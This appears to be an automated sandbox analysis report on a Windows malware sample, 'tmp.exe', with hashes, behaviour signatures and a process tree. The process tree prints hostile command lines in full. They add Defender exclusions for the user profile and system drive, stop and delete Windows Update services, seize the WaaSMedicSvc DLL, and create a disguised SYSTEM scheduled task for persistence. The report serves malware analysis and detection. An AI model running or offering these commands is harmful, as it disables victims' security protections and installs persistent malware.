Analysis
max time kernel: 42s
max time network: 45s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 01-11-2022 22:38
Static task: static1
Behavioral task: behavioral1
Sample: tmp.exe
Resource: win7-20220812-en
General
Target: tmp.exe
Size: 1.8MB
MD5: 6691c3106d5319f108114a48f5177396
SHA1: 1ce92f03b5e7bd1c1d591141693f6e0261f3afee
SHA256: 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97
SHA512: 19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7
SSDEEP: 49152:+1rLSuOMv2pORqIwpn3AcRs3gzAiYSWTqP7:K3O02WyDQDDTqP
Malware Config
Signatures
Modifies security service (2 TTPs, 2 IoCs)
Processes: reg.exe
  Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters (reg.exe)
  Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security (reg.exe)
Possible privilege escalation attempt (2 IoCs)
Processes: takeown.exe, icacls.exe
  PID 1356 takeown.exe
  PID 1412 icacls.exe
Stops running service(s) (3 TTPs)
Modifies file permissions (1 TTPs, 2 IoCs)
Processes: takeown.exe, icacls.exe
  PID 1356 takeown.exe
  PID 1412 icacls.exe
Drops file in System32 directory (1 IoCs)
Processes: powershell.exe
  File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
Drops file in Program Files directory (2 IoCs)
Processes: tmp.exe
  File created: C:\Program Files\Google\Chrome\updater.exe (tmp.exe)
  File opened for modification: C:\Program Files\Google\Chrome\updater.exe (tmp.exe)
Launches sc.exe (5 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe
  PID 568 sc.exe
  PID 1268 sc.exe
  PID 584 sc.exe
  PID 1316 sc.exe
  PID 1072 sc.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies registry key (1 TTPs, 9 IoCs)
Processes: reg.exe
  PID 1956 reg.exe
  PID 628 reg.exe
  PID 552 reg.exe
  PID 852 reg.exe
  PID 1004 reg.exe
  PID 1508 reg.exe
  PID 1656 reg.exe
  PID 332 reg.exe
  PID 304 reg.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: powershell.exe, tmp.exe
  PID 2036 powershell.exe
  PID 1660 tmp.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: powershell.exe, tmp.exe, takeown.exe
  Token: SeDebugPrivilege, PID 2036 powershell.exe
  Token: SeDebugPrivilege, PID 1660 tmp.exe
  Token: SeTakeOwnershipPrivilege, PID 1356 takeown.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: tmp.exe, cmd.exe, cmd.exe, cmd.exe
  PID 1660 tmp.exe wrote to memory of 2036 powershell.exe
  PID 1660 tmp.exe wrote to memory of 2036 powershell.exe
  PID 1660 tmp.exe wrote to memory of 2036 powershell.exe
  PID 1660 tmp.exe wrote to memory of 1972 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1972 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1972 cmd.exe
  PID 1972 cmd.exe wrote to memory of 568 sc.exe
  PID 1972 cmd.exe wrote to memory of 568 sc.exe
  PID 1972 cmd.exe wrote to memory of 568 sc.exe
  PID 1972 cmd.exe wrote to memory of 1268 sc.exe
  PID 1972 cmd.exe wrote to memory of 1268 sc.exe
  PID 1972 cmd.exe wrote to memory of 1268 sc.exe
  PID 1972 cmd.exe wrote to memory of 584 sc.exe
  PID 1972 cmd.exe wrote to memory of 584 sc.exe
  PID 1972 cmd.exe wrote to memory of 584 sc.exe
  PID 1972 cmd.exe wrote to memory of 1316 sc.exe
  PID 1972 cmd.exe wrote to memory of 1316 sc.exe
  PID 1972 cmd.exe wrote to memory of 1316 sc.exe
  PID 1972 cmd.exe wrote to memory of 1072 sc.exe
  PID 1972 cmd.exe wrote to memory of 1072 sc.exe
  PID 1972 cmd.exe wrote to memory of 1072 sc.exe
  PID 1972 cmd.exe wrote to memory of 852 reg.exe
  PID 1972 cmd.exe wrote to memory of 852 reg.exe
  PID 1972 cmd.exe wrote to memory of 852 reg.exe
  PID 1972 cmd.exe wrote to memory of 1004 reg.exe
  PID 1972 cmd.exe wrote to memory of 1004 reg.exe
  PID 1972 cmd.exe wrote to memory of 1004 reg.exe
  PID 1972 cmd.exe wrote to memory of 1508 reg.exe
  PID 1972 cmd.exe wrote to memory of 1508 reg.exe
  PID 1972 cmd.exe wrote to memory of 1508 reg.exe
  PID 1972 cmd.exe wrote to memory of 1956 reg.exe
  PID 1972 cmd.exe wrote to memory of 1956 reg.exe
  PID 1972 cmd.exe wrote to memory of 1956 reg.exe
  PID 1972 cmd.exe wrote to memory of 1656 reg.exe
  PID 1972 cmd.exe wrote to memory of 1656 reg.exe
  PID 1972 cmd.exe wrote to memory of 1656 reg.exe
  PID 1972 cmd.exe wrote to memory of 1356 takeown.exe
  PID 1972 cmd.exe wrote to memory of 1356 takeown.exe
  PID 1972 cmd.exe wrote to memory of 1356 takeown.exe
  PID 1972 cmd.exe wrote to memory of 1412 icacls.exe
  PID 1972 cmd.exe wrote to memory of 1412 icacls.exe
  PID 1972 cmd.exe wrote to memory of 1412 icacls.exe
  PID 1660 tmp.exe wrote to memory of 1092 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1092 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1092 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1444 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1444 cmd.exe
  PID 1660 tmp.exe wrote to memory of 1444 cmd.exe
  PID 1092 cmd.exe wrote to memory of 1560 schtasks.exe
  PID 1092 cmd.exe wrote to memory of 1560 schtasks.exe
  PID 1092 cmd.exe wrote to memory of 1560 schtasks.exe
  PID 1444 cmd.exe wrote to memory of 1996 schtasks.exe
  PID 1444 cmd.exe wrote to memory of 1996 schtasks.exe
  PID 1444 cmd.exe wrote to memory of 1996 schtasks.exe
  PID 1972 cmd.exe wrote to memory of 332 reg.exe
  PID 1972 cmd.exe wrote to memory of 332 reg.exe
  PID 1972 cmd.exe wrote to memory of 332 reg.exe
  PID 1972 cmd.exe wrote to memory of 304 reg.exe
  PID 1972 cmd.exe wrote to memory of 304 reg.exe
  PID 1972 cmd.exe wrote to memory of 304 reg.exe
  PID 1972 cmd.exe wrote to memory of 628 reg.exe
  PID 1972 cmd.exe wrote to memory of 628 reg.exe
  PID 1972 cmd.exe wrote to memory of 628 reg.exe
  PID 1972 cmd.exe wrote to memory of 552 reg.exe
Processes (tree depth in brackets; each entry gives the image path, then the command line, then the signatures it triggered)

[1] C:\Users\Admin\AppData\Local\Temp\tmp.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
      The -EncodedCommand value is base64 of UTF-16LE text and decodes to: <#bp#> Add-MpPreference <#ro#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkl#> -Force <#srd#>  (the <#...#> tokens are PowerShell block comments; the effective command adds the user profile and the system drive to the Windows Defender exclusion list)
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop UsoSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop WaaSMedicSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop wuauserv
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop bits
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop dosvc
        - Launches sc.exe

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies security service
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key

    [3] C:\Windows\system32\takeown.exe
        Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\icacls.exe
        Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

    [3] C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

  [2] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
        - Creates scheduled task(s)

  [2] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\schtasks.exe
        Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/304-81-0x0000000000000000-mapping.dmp
memory/332-80-0x0000000000000000-mapping.dmp
memory/552-83-0x0000000000000000-mapping.dmp
memory/568-64-0x0000000000000000-mapping.dmp
memory/584-66-0x0000000000000000-mapping.dmp
memory/628-82-0x0000000000000000-mapping.dmp
memory/852-69-0x0000000000000000-mapping.dmp
memory/900-84-0x0000000000000000-mapping.dmp
memory/976-89-0x0000000000000000-mapping.dmp
memory/1004-70-0x0000000000000000-mapping.dmp
memory/1072-68-0x0000000000000000-mapping.dmp
memory/1092-76-0x0000000000000000-mapping.dmp
memory/1112-88-0x0000000000000000-mapping.dmp
memory/1268-65-0x0000000000000000-mapping.dmp
memory/1316-67-0x0000000000000000-mapping.dmp
memory/1356-74-0x0000000000000000-mapping.dmp
memory/1412-75-0x0000000000000000-mapping.dmp
memory/1444-77-0x0000000000000000-mapping.dmp
memory/1508-71-0x0000000000000000-mapping.dmp
memory/1560-78-0x0000000000000000-mapping.dmp
memory/1608-87-0x0000000000000000-mapping.dmp
memory/1656-73-0x0000000000000000-mapping.dmp
memory/1660-54-0x000000013FD70000-0x000000013FF4E000-memory.dmp (Filesize 1.9MB)
memory/1660-55-0x000007FEFB871000-0x000007FEFB873000-memory.dmp (Filesize 8KB)
memory/1828-85-0x0000000000000000-mapping.dmp
memory/1956-72-0x0000000000000000-mapping.dmp
memory/1972-63-0x0000000000000000-mapping.dmp
memory/1996-79-0x0000000000000000-mapping.dmp
memory/2008-90-0x0000000000000000-mapping.dmp
memory/2028-86-0x0000000000000000-mapping.dmp
memory/2036-58-0x000007FEED370000-0x000007FEEDD93000-memory.dmp (Filesize 10.1MB)
memory/2036-59-0x000007FEEC810000-0x000007FEED36D000-memory.dmp (Filesize 11.4MB)
memory/2036-56-0x0000000000000000-mapping.dmp
memory/2036-60-0x00000000022E4000-0x00000000022E7000-memory.dmp (Filesize 12KB)
memory/2036-62-0x00000000022EB000-0x000000000230A000-memory.dmp (Filesize 124KB)
memory/2036-61-0x00000000022E4000-0x00000000022E7000-memory.dmp (Filesize 12KB)